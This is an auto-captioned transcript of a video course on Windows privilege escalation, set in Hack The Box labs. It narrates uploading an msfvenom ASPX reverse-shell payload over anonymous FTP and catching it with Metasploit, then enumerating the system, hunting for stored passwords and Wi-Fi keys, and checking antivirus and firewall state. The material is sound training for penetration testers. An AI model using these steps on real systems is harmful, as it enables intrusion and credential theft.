Windows Privilege Escalation for Beginners

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's up everybody TCM here back with another video and today we're dropping another course on YouTube so this course is Windows privilege escalation for beginners if you've ever been in a hacking situation where you land on a machine and you're not an administrative user you're a low privilege user and you need to somehow find out how to escalate your privileges this would be the course for you if you're taking exams such as the pmpt or the oscp or other Hands-On exams that require you to do privileged escalation this course would be for you so we're going to cover in this course is strictly Windows based everything's gonna be Windows based all the labs will be provided I'll teach you how to do that as you go full disclosure this is a course that is on our website so if you go to the TCM Security Academy which I'll link below what we are providing is the first three or so hours of this course if you scroll down here on this website you can see the course curriculum and this is the only time I'm going to try to sell you anything in this course all I'm asking for is if you watch the course and you enjoy it and you want to see the rest it's on our website we'll take you through the curriculum we'll take you through the enumeration automated tools kernel exploits a lot of different escalation paths through here all the way through this run as we do have additional labs and other escalation paths that we continue on in the course and then we actually end with this Capstone that ties everything together however there is a great stopping point here if you just took away from this course right up until this point you'll still come away with a lot of knowledge completely free no purchase required whatsoever the only thing I ask and I wouldn't be a YouTuber if I wasn't is to just consider subscribing to the channel and if you do go to our Channel page and you scroll down there are other full-length hacking courses I think we have 30 plus hours of just hacking course material on here now including a Linux privilege escalation course so the sister or brother course to this course so if you're ever interested in learning more we have plenty of free courses on our YouTube channel would love for you to subscribe now with that Spiel out of the way we're going to go ahead and jump right into the course and I really hope you enjoy it hello everybody and welcome to this course titled Windows privilege escalation for beginners my name is Heath Adams and I'm going to be your instructor for this course so a quick who am I I am a husband hacker military veteran Etc I'm actually a former accountantern security geek and I love to teach I am an ethical hacker day to day and I'm actually a business owner over at TCM security which focuses primarily on ethical hacking so you could see some of my certifications I have including several certifications in the pen testing field and I'm also a twitch streamer YouTuber Etc by the identity of the Cyber Mentor if you're curious to check me out in my other courses I do have the udemy course of practical ethical hacking which at the time of recording does have over a hundred thousand students so I have taught quite a few of you and I'm really excited for those who have joined this course and are looking to learn with me even more so why this course well really to gain a better understanding of privilege escalation techniques and what is privilege escalation well in ethical hacking when you land on a machine and that machine is not system or not root then you have to escalate your privileges and there are a multitude of techniques that you can use to escalate your privileges so we're going to teach not just the techniques but the methodology behind that in this course and another reason is to improve your Capture the Flag skill set so maybe you're deficient in your escalation techniques and you're struggling on Capture the Flag or hack the box or try hack me or any of those sites where you can attack vulnerable machines and you just want to improve there lastly is to prepare for certification courses the oscp the elearn security PTP even the e-learn security pts and the ceh now have practical portions of their exams or are all practical and they require some sort of privilege escalation so if you're trying to prepare for that type of course then this is the course for you so let's briefly talk about the prerequisites and requirements of this course now some ethical hacking knowledge is strongly recommended this course is meant to teach you privilege escalation but is not going to hold your hand like you are a beginner it does assume some knowledge if you have no experience in ethical hacking you are going to be lost in this course it is strongly recommended that you check out the Practical ethical hacking course first and then migrate over here once you've completed that course if you do have some ethical hacking knowledge and you want to take this course and move forward the only other thing that you need is really a Linux or ethical hacking workstation of your choice there will not be any lab set up from our perspective it is assumed that you know how to run a Linux machine or an ethical hacking machine at this point now two big things to point out a subscription to hack the box is really really really recommended it's not required but it's really recommended as a good majority of the machines that we walk through to our hack the Box related now there's also a subscription to try hack me for a couple of the machines that we walk through however I have built an entire lab out and try hack me that will be free for this course so you do not have to subscribe to either of these but it is recommended to do it especially the hack the box side at the time of recording it is 13 US dollars to subscribe to hack the box and around 10 US dollars to subscribe to try hack me and please know I have no affiliation with either of these I have no Kickbacks or anything the reasoning behind this is that Windows licensing is very very expensive so in order to have you build your own lab and purchase your own license we were talking a lot of time and expense a subscription to hack the box and try hack me was a lot cheaper alternative and an easier way to teach this course than having you download and install your own Windows machines and purchasing the licensing behind it so with that out of the way let's talk about what you're going to learn turn so the big focus is going to be on how to enumerate Windows systems manually and with tools you're going to have a lot of Hands-On practice in this course there are 13 vulnerable machines at this time of recording and there are full plans to add more machines as time goes on there is going to be a custom lab out there with no installation we'll either use hack the Box machines or the try Hackney lab that I have built out and there is going to be a Capstone challenge of five machines so throughout the course you're going to have eight machines to practice on the Capstone is going to be five machines by itself and you're going to get to see and test your skills and everything that you've learned now we have a multitude of privileged escalation techniques in this course that we are going to teach including kernel exploits password hunting impersonation attacks Etc even some newer techniques like the windows subsystem for Linux and cve 2019 1388 the goal of this course and for me personally as an instructor is that I will continue you to update this as new privilege escalation techniques come out and I feel that are relevant for this course so when it's all said and done you will have learned a wide variety of privilege escalation techniques and the ways to enumerate them manually and with tools my goal for you is that you should be able to get through this course and feel a lot more comfortable when it's all said and done with your privileged escalation capabilities and the last thing to point out is there are important resources for this course but you have to check the bonus video which is the last video in the course I have a Discord channel that you guys can come check out it has access to q a sections and you have direct access to not just me but other people that are taking the course and it's a the fastest resource to get help when you have any sort of problem you're stuck with in the course so if you run into issues you want to network with other people Etc there is a Discord Channel due to udemy rules we have to actually post that in the bonus video so come check out the bonus video and we'll get you linked over to the Discord Channel with that being said I really do hope you enjoy this course I look forward to teaching you and I'm excited to get started so let's go ahead and move on to the next video and we're going to start talking about the important resources to know for privilege escalation and how to be successful in this course so I'll catch you over in the next video before we fully dive into the course I would like to share with you some of my favorite resources that I've uncovered while doing prevask especially on the Windows side so the first one here is this fuzzy security now this is the one that I went with when I was doing the oscp since then better ones have come out but this is still one that I like to refer to if you come through here it gives you a step-by-step guide on all the little things that you might want to look for for doing prevask and you can see how long this guide really is it's amazingly detailed and it will help you out significantly now there are three other guides just like that here is a Windows priv ask and this one's way more up to date and covers a lot newer stuff we'll be referring to this one quite a bit more from payload all the things or the Swiss Swiss Sky repo so you can see how many things are in here as well now I'm going through this really fast we're going to go kind of one by one as we go through the course so don't worry about it here again Windows privilege escalation guide and another Windows privilege escalation guide I'm going to link all of these in the course resources so you can check them out you can look through them see all the different things and you can see that privilege escalation is very detailed all of these guides are very very long because there are so many different ways to escalate a Windows system even a Linux system there's just all kinds of escalation techniques and there's no course that's going to cover them completely but I'm going to do my best to get you with the methodology that you're gonna be able to find a lot of these without any issues but what I need for you to do to be successful in this course is I want you to make sure that you are taking good notes and make sure that you are understanding the concepts if you're doing something and you're not getting the reasoning go back and watch the video again if I'm not clicking with you then go out to Google make sure that you find the resources you do the read eating and you understand the concept before you move on to the next item so good notes are going to take you really really far now of course you've got these notes here that you can refer to but it's always at least for me always good to take good notes take screenshots make your own commands up and have your own cheat sheets that you can refer to on top of these things and just writing it down really does help so it helps you retain the information it helps you understand the information so make sure you're taking good notes if you get stuck again if go watch the video again or go out and check for other resources and just make sure you're understanding everything before you move on in the course other than that I really really do hope you enjoy the course and I look forward to teaching you throughout this entire course and I hope you enjoy the experience so I will catch you in the next video as we start to dive into enumeration and getting our first foothold on the network so let's go ahead and meet you in the next video welcome to the first part of this course so before we can actually dive into privilege escalation we need to actually have something to escalate privileges against now I weighed the decision pretty heavily on how I wanted to approach this the most economical way was to actually use a service similar to hack the box or try hack me or or one of those other services that are out there that have labs this is because windows requires you to have a license you see a lot of Linux boxes out there for free well Windows requires a license and Licensing can be expensive so instead of requiring licensing the cheaper alternative was to use a vulnerable site like hack the box and give instruction via this so what we're going to do is we're going to utilize hack the box now for the first portion of this course you can actually run this on any Windows machine we're just doing basic enumeration but what we're going to be doing here is we're going to simulate an attack we're going to get lower level privileges on a machine and then we're going to do enumeration on that machine now you can forego all this and just do this from your command line on your own Windows machine nothing malicious is going to be done during the enumeration process however if you want to follow along step by step you will need a hack the box subscription so that will run ten dollars to thirteen dollars approximately and if you've never used hack the Box before that's okay it does require you to quote unquote hack your way in however that is very easily googleable if you want to do some research and look on how to get a subscription it's very very straightforward so we're going to be utilizing this for the enumeration portion and then as we start to tackle machines and one-off type vulnerabilities I'm going to be using different machines here to show you how that works now throughout the course my challenge to you is going to be to attempt the machine that I show you before actually watching the next video so what we're going to be doing for this for example is we're going to be spinning up this devil machine d-e-v-e-l and it lives at 10.10.10.5 so all you have to do is press the start button machine which I've already done you can just press start button next to it get it spun up and then what you're going to do is go ahead and try to scan it use nmap try to attack it see what happens what I want you to do is try to get to the low level user and then meet me in the next video we're going to go through a walk through after that we'll start the enumeration so if you have any questions you want to see my methodology I'm going to cover that in the next video but I'm going to kind of do it kind of quickly again this is kind of more of a non-beginner course we're kind of moving into the intermediate style level so I almost expect you to be able to solve this first half and then meet me kind of in the Middle where I teach you how to how to escalate the Privileges that makes sense so every box that we do in this course I'm going to challenge you to go ahead and try to get to that low level user and then we'll work on escalating but every box will have a walk through in case you do get stuck so what I'm going to do now is ask you to go ahead and try give it a go and in the next video I'm going to show you how to get a low-level user on this box and then we'll start working on enumeration and moving forward with our escalation tactics foreign so I am back now with the scan and you can see that I have the scan here which is showing us Port 21 and Port 80 open now when we look at Port 21 we've got the file transfer protocol now if you recall that just means that we can upload and download files off of a server we're just transferring files and we can see here that we have Anonymous login via the FTP and the files look almost like a default IIs web page we've got the isstart.htm and if you've ever seen that you know you're just looking at the hey this is a web page hasn't been built yet you got the welcome.png it feels very very welcome page and then we've got Port 80 which is just saying hey it's Microsoft IAS and it's got an is-7 header but it doesn't really say anything about what's on there so let's make a quick little journey out to the web server and see at 10.10.10.5 what we've got uh and there it is it's a it's a welcome page now if we right click on this and we say save image as you can see the image is actually welcome.png so I have a little hunch when I'm just looking at this scan that we're actually sitting in the web server directory itself now what we have here is we have Port 21 open and while Anonymous login is bad all we can do is put and delete files it becomes really bad when we can chain the exploit and actually execute a file so my hunch is that we can upload something malicious and then execute it with Port 80. so we're going to go ahead and test that out first we're going to just do a quick Echo and say this is a test and I'm going to put that into a file called test.txt from here I'm going to go ahead and FTP out to the server and I'm going to see if I can upload this file and then access it so I'm going to go ahead and just type in Anonymous and try to log in and I'm using Anonymous as the password as well we can go ahead and just say put and we'll say test dot text now if we go out to the web once that file's uploaded and we say test.txt you could see it says this is a test okay that works so what we're going to do now is now that we know we have execution we can go ahead and get malicious we can go with the new tab and what we want to do is we want an aspx type exploit now why do I say that because this is an IIs server we can see if your utilize utilizing something like appalyzer we've got asp.net obviously it tells us IAS so the file extension for that is aspx now if you've never done this before you can go out to Google and say uh interpreter payload cheat sheet something along these lines and we've got medicine payload cheat sheet msf NM cheat sheet we'll go ahead and just use the msfm cheat sheet and any sort of web payloads we're looking for something like ASP or aspx so this one will work right here creates a simple TCP shell for ASP so we're just going to use msf Venom Dash p Windows interpreter versus underscore TCP we'll set our lhost our L port and then our file type so that's the kind of syntax we're going to be using you can just follow along with me you don't have to actually go out to that website and copy and paste everything so this is going to be the initial start of the payload we're going to say windows interpreter reverse underscore TCP for the payload and then we need the lhost which I don't know my L host so I'm going to go out and say ifconfig and I am connected here 10.10.14.4 so I'm going to go ahead and use that as my lhost and then for my L Port I'm just going to say all fours and then remember we're going to need the file type so for this I'm going to use aspx and then we're going to go ahead and just call it exploit.aspx and that should generate a shell for us now once that is generated what we're going to need to do is we're actually going to need to load up Metasploit now this course is not going to rely on metasplay a lot this is just the initial exploit vector and I'm going to show you some initial enumeration that you can do with Metasploit but everything is going to be pretty manual moving forward after this little bit so let's go ahead and we're going to use multi exploit exploit multi-handler sorry and we're going to go ahead and say options so we're going to do is we're going to set the same payload that we just did so we're going to set payload to Windows interpreter [Music] and then we're going to say reverse TCP you should be able to tab it out now if we go to options you can see that it automatically sets the L port to the default 4444 we also need to set an L host so I'm going to set my L host to Tunnel zero which is the interface that we are on right now so if you're on a different interface or you can set it directly to the IP address and then I'm going to run this and this is going to set up that listener so now we're listening on this port for a reverse connection using Metasploit to do so so I'm going to go in here and I'm going to reconnect because chances are this FTP is probably timed out I'm going to go in here and just reconnect real quick and we're going to upload this file so now we're going to put the exploit.aspx and with our listener running we're going to go ahead and go out to the web I'm going to close this out and I'm just going to forward slash exploit.aspx just like this hit enter let's see what happens okay we've got a meterpreter session so session one is open we can say get uid see if that works okay and we can say uh sysinfo and you can see that we are on a Windows 7 machine 32-bit or x86 architecture we have a 32-bit interpreter shell and our ID here is Ias app pull web so we are not an administrator we are not Authority system so that means we have privileges to escalate so we're at the perfect stopping point and if this didn't make sense to you maybe you're not ready for this part of the course yet maybe this is a little Advanced you might need to go back and do some more studying you could check out my other udemy course as well which is uh takes this and walks you through a lot more step by step and will get you ready for something along these lines but if this all made sense you figure this out already we're good to go we're good to move on and we're going to start working on these escalations so I'm going to see you in the next set of videos where you start talking about enumeration and how we're going to look at and identify things that can be potentially exploitable and allow us to escalate our approaches so I'll see you over in the next video so now we have a shell and we need to start focusing on enumeration now this just goes back to our hacking Roots you know the five steps of hacking and the first three of those are information gathering scanning and enumeration and then exploitation well we've done that and now we've exploited this machine but we are a low level user so guess what we have to go back to our roots and we have to start focusing again on that scanning and enumeration we have to look at what information is out there and see how we can utilize that to elevate our privileges into a system level user that is our end goal here so what we're going to do first is we're going to focus on system so system enumeration is looking at things like system info and we can see things like the operating system name or the operating system version maybe the system architecture we can look at the hostname we can extract patching and see what sort of patching is out there what sort of hot fixes are out there and we'll talk about that here in a second and we can look at things like the drives on the system Etc so we just want to take a look at what the system is providing us from a high level so let's dive into a shell and one of the first easy commands that we can do is just type in system info and this will come back into play a little bit later when we actually utilize tools for all of this but here you can see that we have the hostname we've got the operating system being Windows 7. we've got the operating system version we got the manufacturer all sorts of information who the owner is of this machine we could tell we're running on VMware so x86 architecture Etc now in all those resources that I provided you there are some great one-liners now this is one of those I've kind of Taken and modified but let's say that we want to just pull down system info and we kind of want to grep upon it and I just want to pull down a few things so let's say system info and the pipe here is similar to grep we're going to just say find string and we're going to just go forward slash B forward slash C and we're going to grab the OS name we're going to grab the OS version and we're going to grab the system type and let's take a look at what this does now I don't expect you to type this all out it's just as easy to put in system info and review this but say you just wanted to pull down this information this is a quick way to do it and this is a good way just to learn the syntax of Windows command line if you're not familiar with it so we can do a quick find string pull down some information and now we just see instead of all this mess we can say hey we're running on Windows 7. here's our build version here's the version type Etc and then we've got an x86 architecture on this PC so that's very useful information to know for example if we're trying to run an exploit against this machine and this exploit is for 64-bit only we can rule that one out because we know hey it's only x86 architecture or if we're trying to run a kernel based exploit for example which we haven't gotten to yet and we're trying to do it against a version that is newer than this it's probably not going to work so we want to make sure that we fall in line with the right parameters for the exploit and having the information in front of us helps same thing maybe the exploits for Windows 10 and doesn't work on Windows 7 or maybe it's for Windows 7 Home Edition doesn't work on Enterprise there's a lot of variables here for exploits that we need to kind of understand the information behind them before we can just start firing exploits at this so it's good to know your system info if you want to pull down things like hostname you can add that in or you can just type in hostname for example but also appears in the system info another important thing to do is we can extract patching so we can look at how well patched the system is now it's not going to work on this system this wmi qfe and I'll explain what this is in a second you can see I typed it in doesn't work so I'm going to pull up another Windows box that I have and I'm going to show you what it does look like when you actually run it against the system where it works now wmi what is that that's the Windows management instrumentation and the C just stands for command line basically what it does for us is it returns information about the system that we're running it on and what we're looking at with the qfe is what's called Quick Fix engineering we're basically just trying to see hey what's available what's been patched when was the last patch so let's pull up this command prompt here and let me just say wmic qfe here and if you have a Windows machine you can do this again on yours and you can see things now you can see okay well here is the knowledge base ID here's the hotfix ID here's who installed it and here's when it was installed so maybe we know based on these different knowledge bases whether or not something is patched or not patched with what we're looking at so this is a very common quick and dirty command to run now we can run something like this let me just copy and paste it and show it to you if you want to copy and paste this out you can and that do not copy I apologize uh so when we copy and paste this we can kind of narrow down and just say wmic qib and then we can say get and we could just pull down what we want so we only want the caption the description the hotfix ID and then installed on then we can really narrow down and not have to look at this big list we can just get a nice and cleaner list here so this is one of those things just like that system info where you can put this into a quick copy paste list if you're doing enumeration or we can rely on tools once we get to the tools section to actually kind of help us and do this for us so this is important to know again we can look at the knowledge basis see what's out there and how we can exploit it so the last thing I want to show you with system related for now we'll get into more things that we're going to look at as we go but just the basics of what we're looking at is just let's list out the drives maybe there's other drives out there so what we can do is we can do it at wmic again and we can just say logical disk and you can see all the different information here that looks kind of dirty right we don't really want that so we could do something like list drives or uh actually or we could just do something like this this is what I actually like to copy and paste so we could do wmic and again we'll just do get caption description provider name and Watch What Happens and then you can see hey c d e f and H exists on this one specifically now if you just wanted it really quick and you just want to say hey wmic logical disk you could just say get caption and get the caption and it'll still pull down how many drives are there and you don't have to necessarily pull down the description or provider name but uh quick quick wins here to see what's there maybe you're enumerating a machine and you're on the C drive but maybe there's this e f and H drives that you can look through maybe there's information in those drives you want to make sure that you have the knowledge in front of you and all the information in front of you that's possible so that's it for this video we're going to go ahead and move on to user base enumeration and so I will catch you in the next video when we start talking about how to enumerate users and groups okay now we're on to a user enumeration we're back on our machine let's just go ahead and type in Shell on this and we can look at the different types of users first let's start with ourselves we get to say something like who am I and you can see on this machine where IIs app pool so this means that we are not the system level user that's okay we can also look at our privileges say who am I slash prev and this will provide some information and all this might not make any sense right now this will come back into play later when we talk about token impersonation and how we can utilize that from different perspectives one from what we call potato attacks either juicy potato rotten potato Etc or even just standard token impersonation we'll talk about that in Privileges and how they work so it's very interesting but we'll dive into it later just know this who am I Prive command exists and that allows us to look at different privileges that we have available to us so last we can do who am I slash groups and we can look at what groups we're involved in so you can tell that this user is not part of any sort of administrative group we just look to be part of standard users nothing going on here that's exciting for us but you never know we might be part of an administrator group and we might have rights in even though we say IIs app pool maybe it was misconfigured and we actually have admin rights to begin with so it's always good to look at the groups that we're belonging to now we could type in something like net user and that will show us the users on this machine so you could see that there are actually just really two users they have a guest account but we have administrator and then this babus user well we're honest service is what we actually landed on so we're not on a real user account we just happen to be a part of a service that's running which is the IIs service so what's happening here is we're taking over a service but there are these user accounts so maybe we can move laterally into a user account and then escalate into administrator or maybe we can just escalate directly into an administrator account we don't know quite yet but it's good to know what's out there and how we could take advantage of it possibly we could also look at specific users like we want to say net user babis and we can see information about babis we can see when their password was last set when it expires all of this is just extra information right and you can see what group memberships they have same thing with the net user of administrator we can take a look at this and you can see what group memberships they have well look they're part of the administrators where this babus user is just part of the users group so if we were to take over this babus user it still wouldn't matter because we wouldn't be escalated fully we would just be at a same level user that we're at there might be more information maybe there's a password store to file or something on that user that we didn't have access to as the current user but for now it's not an admin user we can identify what admin user we could possibly take over just by doing quick user enumeration like this so the other thing that we can look at are the local groups so we could try net local groups sometimes it works sometimes it doesn't you can see here we don't have a logon session that actually exists so it's not going to work for us but maybe we know a local group that does exist like administrators then we could say hey I want to look at the administrators group maybe there are a bunch of users and we just want to see who's part of that group well we could find out the membership quite easily here we see it's administrator and that's all we have to focus on so that's really it for now again a lot of these are going to come back into play later on I'm just trying to get you introduced to the basics and kind of get you introduced into what you should be looking for system related user related and then next we're going to focus on network related so we're going to dig into some Network enumeration and move on from there so I'll catch you over in the next video so next up on the list are our Network enumeration commands and I'm just going to throw a few at you for now but we're going to explain why they're important so again we're going to go ahead and enter into a shell and let's take a look at some of them the first may be obvious but we're going to run an ipconfig now we can run an ipconfig and see what the IP address is of the machine we can also get more details by running ipconfig all and seeing a little bit more information than we did before we can see the default gateway we can see the DNS servers Etc so this just provides information on the architecture we might even see something like if we're on a domain we might see the domain controller here as a DNS server or just give us a little bit more information as to where our next attack might be what our subnet structure is ETC so important to know another thing that we're going to look at is we're going to look at our ARP table so we can just say something like ARP Dash a for ARP Dash all and this won't be that big on most CTF machines but if you're in a lab environment there's a chance that you might see another IP address here so we see two in 255 chances are this is a broadcast ID and maybe this is your network ID here it's hard to say without knowing for sure but we know we're at a dot five uh or actually yes our DOT two is our DNS server so we know we're talking to DNS and then we have a dot five which is us maybe we saw like a DOT six or a DOT seven or a DOT 75 whatever if we saw another IP address in here I would be instantly suspicious as to why it's in our Arc table especially in a lab environment and how it's communicating with us and what we can do about it so if you're not familiar with these networking protocols then you're probably need to brush up on what ARP is or what ipconfig is etc those aren't going to be taught in this course but we should be looking at the ARP table we should also be looking at the routing table something like a quick route print will tell us where this is communicate as well so we're interested in seeing the 10 address and you can see the 10 10.10.10.5 there's not like another Network on here same thing with the ipconfig by the way sometimes you see dual home IP addresses where there's a 10.10.10.2 and maybe you would have something like a 10.10.10 or 10.10.11.2 or something like that or dot five where we see a second Nick on this machine and that would mean that this is communicating on one address and then communicating on another address and maybe we don't even need to elevate we just need to Pivot on this machine so there's a lot of different reasons for looking at what's going on here same thing with the ARP table that's another thing if we're communicating to another machine that's important to know the routing table same thing and then netstat is super important so let's do a netstat dash ano and see what ports are out there we should know uh you know where are we talking to who are we communicating with well you can see we're communicating with us over this four four four four and that's an established connection but what about all these listening ports like we're listening on 139 okay but we have all these other IPS here that we're listening on and how many of these actually showed up when we were looking at the Box originally well not a lot of them right we had 21 and 80. I didn't see any of these externally facing to us when we did a search so where are these ports coming from uh here's UDP ports where are these ports coming from why are we seeing them uh you know inside the box but we're not seeing them outside the box so maybe these services are only available to us from the inside Network and that could be interesting too because that could allow us maybe to do some sort of port forwarding uh using a tool like plink or even interpreter can do it and that's just a foreshadowing of what you might see a little bit later on in the course so keep that in mind that these internal services are important as well so for now we've established that we need to do some basic enumeration right we need to look at the systems we need to look at the users we need to look at the network just kind of gather what's around us before we just start going crazy and looking around all the files and infrastructure now when we get to the tools section I'm going to show you all the tools I can do this for us the next thing I want to show you before we move on and start looking at different tools and start talking exploits is I want to show you how to do some basic enumeration hunting down passwords and then we'll move on and start doing our actual exploitation and using tools and Etc so I'll catch you in the next video we start talking about hunting down passwords now let's briefly talk about passwords and we can drop down into a shell here and I say briefly because there's a lot of password hunting that can be done but we're going to be able to automate that as you're going to see in the upcoming tools lesson and you're going to be able to see in the password hunting section of the course but we have to think about passwords being in files now from a pure pen test perspective I see passwords and files all the time if I get onto a user computer or I get into some kind of share drive people just store passwords and files it's what they do but this could mean more than just that we could be talking about the Sam file which would store our hashes on Windows if there's a backup that laying around or something called unattend.xml which is used sometimes in stores passwords we talk about Wi-Fi passwords think about somebody taking their computer home getting on their network using the same password that they use for their Wi-Fi at home and then using that as their work credentials or something along those lines so there's passwords that are stored in clear text for Wi-Fi there's a lot of things that are out there where passwords can be stored passwords could also be stored in the registry and I'll show you some of these things and we'll do a quick overview of kind of what we're looking for and how it works and then we're going to look in the tools section see how that works when it's automated and do a lot of this leg work for us then we'll we'll see how it comes all together later on when we actually exploit this and we see how passwords can be dangerous but from a pure password perspective uh super super common at least in real pen testing and something to always look for when we're talking about this Capture the Flag style priv-esque environment so I'm here in this inet serve and we can do a quick find string so we get to say something like find string if we do a slash s i and we're just going to search for maybe the phrase password and we can search for that in just.txt for example and this is going to find nothing we could go back a directory so it's only searching in the directory we could go back One Directory to system32 and maybe I'll just copy this and paste it here and we if we want to search more files we could we could say something like dot ini dot txt maybe like dot config this will add time to our search but we could try to hunt these down now while this is going this might take a minute as we're looking through the whole system 32 we can go ahead and just kind of look at some resources that I actually really like and we'll uh we'll go from there and actually it just finished pretty quickly here so you can see what it's trying to do it's looking for the phrase password and you can see it comes into play here in this hash tables and it really doesn't look like it's anything it just looks like it's a configuration or just a basic dot txt same thing here so we're going to find a bunch of these things we might have to sift through but it's just part of the numeration process and somebody might have maybe on their desktop just like uh password is equal to my password One Two Three or something along those lines or think of like a SQL configuration or a web configuration that's why we search maybe those dot config files to try to look for different passwords that we might be able to use to escalate now those resources this just comes back to the resources we pointed out in the first section of the course here's a clear text password section now if you like to do this the complete manual way there's a bunch of different ways to do this right you can search for the term you could search in files again this unattend.xml uh there's vnc.inis registry uh the payloads all the things is more my favorite one to kind of have and look through so you have uh the Sam again search File contents all different kinds of cool little things and tricks and if you really want to scare yourself you can do the Wi-Fi passwords that you can show your Wi-Fi passwords here and see the password of your Wi-Fi network in clear text so I recommend if you're using the same password as your Wi-Fi not to do that because it's very easy to pull it down so with all that being said this is just a very very high level overview we're going to get into it as I said already we're going to get into it in a little bit so stay tuned for the next few sections of the course as we actually start to dive in and utilize this and you'll see where these passwords really come into play so we got one more video in this section we're going to quickly talk about discovering firewalls and Antivirus and how we can determine if they're enabled in a network so let's go ahead and jump over to that video all right so the last thing we want to look at are the firewall and anti-virus configurations on the machine itself now these don't come into play too often on the capture the flag style events but it's always something to look at because some of the harder ones actually do have a firewall enabled or anti-virus enabled so we need to know kind of what we're up against and it's always good to enumerate that even if you're in a real world environment it's really good to enumerate that so what we're going to look at first is we're going to look at the service control and you're going to see this come up again in the course uh over and over so the service control command is SC let's go ahead and drop down into a shell and we can just say SC for service control and let's say we want to just query one that we know and I'm just going to say query and I'm going to find out information about wind defense so if we say win defend we're going to see information about Windows Defender why am I picking this well we're on a Windows machine and by default Windows machines have Windows Defender on well look it's running we know the state is running so antivirus is up on this machine and running but it's not doing a great job if you ask me we were able to run metasploy with a basic shell we got in on 4444 so not the best and this is Windows 7 so maybe there's some excuse there maybe it's misconfigured on purpose we don't really know but the state is running let's say we see it as stop but we think that maybe there's something still blocking us some kind of antivirus is running on this machine and we don't know what's going on we can do a quick service query we could say something like uh service control and we'll do a query ex like this and we'll just say type equals service now this is going to tell us all the services that are running on the machine it's going to be a lot but if we want to kind of search through here and see hey what's running what am I up against like see here's Windows Defender but you might see something like I don't know Sophos as an example you might see some well-known antivirus running on this machine you're going to say oh I'm up against that now I know what's there and maybe you start looking into ways to bypass that just as an example now the last thing that we should talk about is uh firewalls so firewall settings are important to look at too so we want to see firewall settings because maybe there are ports open or only certain ports that we can navigate around maybe as you'll see later again with the net stat that we looked at maybe there's ports that we can utilize that are only internally open and we can utilize those for some sort of port forwarding and use that to exploit a machine further so there's a lot of cool little tricks that we can do but we have to know the firewall configuration especially if we're getting blocked on ports like 4444 which is really common to Metasploit we might have to run something like 443 and pretend we're doing traffic over a web server or maybe 53 and pretend we're doing traffic over DNS something along those lines we got to see what's actually open for us so what command we can run the common command or the modern command I should say is this net sh ADV firewall firewall dump now this isn't going to return anything and that's okay we are going to use a different command this is a little bit older but we're going to say firewall shows state so either way try both of these commands depending on the machine you're on so this tells you what the state of the firewall is you can see that it's enabled and that it's running the regular old Windows Firewall Group Policy version so that's a little bit of information other information that you can gather is net sh firewall we can show the configuration and here's where you can look for like specific ports and things that might be open or any sort of configurations that are in here that are special to this machine so I'm not seeing anything crazy here which is expected we got in on 4444 but it's just something to keep in mind if you're doing enumeration if you're up against a wall something that might be sticking out so something to keep in your back pocket again this is going to be automated when we look at our tools but it's always good to know the process manually and understand why it's doing it or why the tools are running it instead of just firing tools with you know no purpose behind it or no understanding behind it so that's all this section was and now that we're wrapping up we're going to see how we automate it in the next section so I just want you to have good notes at this point if you didn't take good notes please go back watch these again or even go and check out the resources that were provided jot down some decent notes on this understand why we're doing it and don't just go fire tools at this so it's just a really high level overview for you to get the understanding but now that you have the understanding we're going to dive into the tools so I'll catch you over in the next video as we start looking at different tools that we can utilize and make this process a lot easier for us okay let's quickly cover some automated enumeration tools and I'm just going to show you the list that I've got put out here so we have executables these are files that we can either just upload right off the bat or we can compile using something like visual studio and then upload and all these will work with Windows winpies being probably my favorite but there's also a tool called seat belt there's a tool called Watson there's a tool called sharp up now these all do generally the same thing on the Powershell side there is a tool called Sherlock which is actually the predecessor to Watson there's a tool called power up which is the same thing as sharp up but it's written in Powershell as opposed to C sharp there's a tool called Jaws which is awesome as well and a couple of my favorites which are this Windows exploit suggestor which is actually a python script you run locally on your attack machine and explains the gesture from metasploy so I'm going to cover some more of these tools and details here in just a second and then in the next video we're going to cover uh running one of these tools or two of these tools and see what happens when they just don't work what are we going to do well these other categories come into play these are really nice tools but there's a reason there's an assortment of tools because sometimes your executables don't work sometimes your Powershell doesn't work sometimes they both don't work so what are you going to do when the tools that you rely on just aren't working well luckily there's so many tools out there we're going to figure it out so you can take a screenshot of this I'm going to upload or put in the resources literally every single thing you see here I'll put a link to in the resources that way you have everything but let me go ahead and go to my attack machine and let's just talk through some of this stuff really quick so win peas when peace is a great great great tool so you see windpies here the windows privilege escalation awesome script is what it stands for it is awesome there's nothing else to say about it besides it's awesome now this does run requiring a DOT net of four uh so if there's not a 4.0 or greater on the machine that you're tacking on this just is not going to work uh now there is a bat file that you can try to see if it works for it that's another option is this winpies bat the executable works really well also so that's one option and the nice thing about it too is this book.hacktricks.xyz is just yet another great resource that you can do you can come in here and it's just a checklist for for Windows prevask now it says Hey first thing we want to look for is the kernel vulnerable well we haven't gotten to Kernel exploits yet it's coming soon but but let's just open this in a new tab and see what they're asking about but it says Hey search for exploits for for vulnerabilities here and how do we do that well System Info well that one looks familiar uh this looks familiar right getting the OS name OS version uh doing the wmic with the qfe to see uh the installed patches on the machine it even tells you some of the tools down here that you might run against this the local exploit suggestor is one from metasplay Sherlock and Watson are two that we just talked about so those are some things that you can do to come through here and look and it talks about all the different types of enumeration that you can run through your checklist even coming through here hey look logging in AV enumeration user privileges Network information uh there's so many things to check for on this this prevask checklist right the nice thing about it is this tool does it all for you and it does all this for you and so do the rest of the tools really they're all very much the same in a what they do and they're all very awesome in their own way so things like Sherlock Sherlock is a Powershell script that looks for common vulnerabilities okay it's not as complete in my opinion as win peas and what you need to do is you just need to run these against your machines see what works for you honestly the best place to run these is against your own computer or a computer you have in a lab environment if you've got a Windows machine running it doesn't hurt to run it there's nothing malicious going on it's just doing checks and I'll show you one against mine that I ran for win peas because winpies isn't going to work on the box that we're doing but I really do love win peas uh another one from rostamouse is Watson Watson's just another great tool updated to include you can see 2019 vulnerabilities so more updated than Sherlock and Sherlock is now deprecated the only issue that I have with Watson is it comes in an slm file meaning visual studio and meaning we have to provide it with a or we have to compile it and we have to know the.net version running on the machine so it makes it a little bit more difficult to run this not that it's not a great tool it's just a little more difficult uh Powersport which we're actually going to focus on power up in this course is a great great tool you're going to see this come up again even though it's not going to come up right now in the section you're going to see some of these tools come up again as we enumerate other boxes so just because you don't get to use them right now don't fret you're going to see it over and over again uh another one that's coming out is the Jaws just another Windows enumeration script also runs in Powershell does a lot of the same thing I'm skipping ahead just a little bit going a little fast here because I want to talk about this one here now Windows xplay suggestor dot Pi is a great tool so let me scroll down just a little bit and show you the usage you can see that we just update the database that it has so it has a database that's out there it pulls it down from it if there's any dependencies we'll install those but we use the system info all we do is do a system info grab that put it into 